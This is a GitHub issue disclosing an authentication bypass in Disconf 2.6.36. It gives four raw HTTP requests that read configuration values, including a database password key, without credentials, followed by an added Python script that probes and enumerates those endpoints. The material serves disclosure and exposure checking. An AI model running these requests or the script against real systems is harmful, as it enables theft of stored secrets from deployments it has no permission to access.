
Improper permission management allowing unauthorized users to access sensitive configuration information #431

Open
gaogaostone opened this issue Oct 23, 2024 · 0 comments


@gaogaostone

Disconf version 2.6.36 has improper permission management, allowing unauthorized users to access sensitive configuration information stored in the configuration center.

Proof of Concept:

1) Access /api/config/list without authentication to retrieve all the parameters and their values for a particular app in a particular env with a particular version.
Send the request as follows without a cookie or token, and it responds with the parameters and their values.
The request is sent with three parameters. The first parameter is app, aka the product name, which may be guessed or brute-forced. The second parameter is env, which is fixed in the platform to four values: rd, qa, local and online. The third parameter is version, which can be guessed from the naming convention.

GET /api/config/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html


2) Access /api/config/simple/list without authentication to retrieve all the parameters for a particular app in a particular env with a particular version. This interface only returns the parameter names, without values.
Send the request as follows without a cookie or token, and it responds with the parameters.
The request is sent with three parameters. The first parameter is app, aka the product name, which may be guessed or brute-forced. The second parameter is env, which is fixed in the platform to four values: rd, qa, local and online. The third parameter is version, which can be guessed from the naming convention.

GET /api/config/simple/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html


3) Access /api/config/item without authentication to retrieve the value of a particular parameter of a particular app in a particular env with a particular version.
Send the request as follows without a cookie or token, and it responds with the value of that parameter.
The request is sent with four parameters. The first parameter is app, aka the product name, which may be guessed or brute-forced. The second parameter is env, which is fixed in the platform to four values: rd, qa, local and online. The third parameter is version, which can be guessed from the naming convention. The fourth parameter is the key of the parameter, which can be guessed from the naming convention.

GET /api/config/item?app=demo1&env=online&version=1.0&key=jdbc.db_0.password HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html


4) Access /api/config/file without authentication to retrieve the content of a parameter file for a particular app in a particular env with a particular version.
Send the request as follows without a cookie or token, and it responds with the content of the parameter file.
The request is sent with four parameters. The first parameter is app, aka the product name, which may be guessed or brute-forced. The second parameter is env, which is fixed in the platform to four values: rd, qa, local and online. The third parameter is version, which can be guessed from the naming convention. The fourth parameter is the parameter file's name, which can be guessed from the naming convention.

GET /api/config/file?app=demo1&env=online&version=1.0&key=spring-cache.properties HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html

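The four probes above, turned into a reusable exposure check. This is an added example written for this page; it is not code from the reporter or from the Disconf project. It sends each request with no cookie or token, exactly as the report does, and classifies the answer. Because the report shows the responses only as screenshots, the classifier's expectation that a successful lookup returns JSON with a non-empty `result` payload is an assumption; adjust it to the response shape you observe. The base URL, the `anonymous_get` helper and the `disconf-exposure-check` User-Agent string are likewise assumptions of this example, and the fetch function is injectable so the logic can be exercised offline against canned responses.

```python
"""Unauthenticated-exposure check for the four Disconf /api/config/*
endpoints described in the report. Added example, not the reporter's or
the Disconf project's code. Requests carry no Cookie or Authorization
header; an "exposed" verdict means an anonymous caller received data."""
import itertools
import json
import urllib.error
import urllib.request
from urllib.parse import urlencode

# The four fixed env names the report says the platform uses.
ENVS = ("rd", "qa", "local", "online")

# Endpoint -> extra query parameter beyond app/env/version, as shown in the
# report's requests (the "key" parameter names an item or a properties file).
ENDPOINTS = {
    "/api/config/list": None,
    "/api/config/simple/list": None,
    "/api/config/item": "key",
    "/api/config/file": "key",
}


def build_url(base_url, path, app, env, version, key=None):
    """Build a probe URL with the same query parameters as the report."""
    params = {"app": app, "env": env, "version": version}
    if key is not None:
        params["key"] = key
    return base_url.rstrip("/") + path + "?" + urlencode(params)


def candidate_urls(base_url, apps, versions):
    """Enumerate probes over app x fixed env x version. /api/config/simple/list
    returns key names only, so it is the least sensitive endpoint to use when
    confirming exposure across many apps."""
    for app, env, version in itertools.product(apps, ENVS, versions):
        yield build_url(base_url, "/api/config/simple/list", app, env, version)


def classify_response(status, body):
    """Verdict for one anonymous response.
    Assumption: a successful lookup answers 200 with JSON carrying a non-empty
    payload (top-level list, or a dict whose "result" is non-empty); a 401/403
    or a redirect (typically to a login page) means auth is enforced."""
    if status in (301, 302, 401, 403):
        return "auth-enforced"
    if status != 200:
        return "unexpected-%d" % status
    try:
        data = json.loads(body)
    except ValueError:
        # An HTML login page served with 200 lands here.
        return "non-json"
    payload = data.get("result") if isinstance(data, dict) else data
    return "exposed" if payload else "no-data"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a 302 to the login page is itself the signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def anonymous_get(url, timeout=10):
    """GET with no cookie or token; returns (status, body_text)."""
    req = urllib.request.Request(
        url, headers={"Accept": "*/*", "User-Agent": "disconf-exposure-check"})
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def check_instance(base_url, app, env, version, key, fetch=anonymous_get):
    """Probe all four endpoints for one app/env/version and return a
    {path: verdict} dict. `fetch` is injectable for offline testing."""
    results = {}
    for path, extra in ENDPOINTS.items():
        url = build_url(base_url, path, app, env, version,
                        key if extra == "key" else None)
        status, body = fetch(url)
        results[path] = classify_response(status, body)
    return results


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    verdicts = check_instance(base, "demo1", "online", "1.0",
                              "jdbc.db_0.password")
    for path, verdict in verdicts.items():
        print("%-15s %s" % (verdict, path))
```

Run it against an instance you are authorized to test; any endpoint reported as "exposed" confirms the behaviour in the report, while "auth-enforced" or "non-json" (a login page) indicates the instance requires authentication for that path.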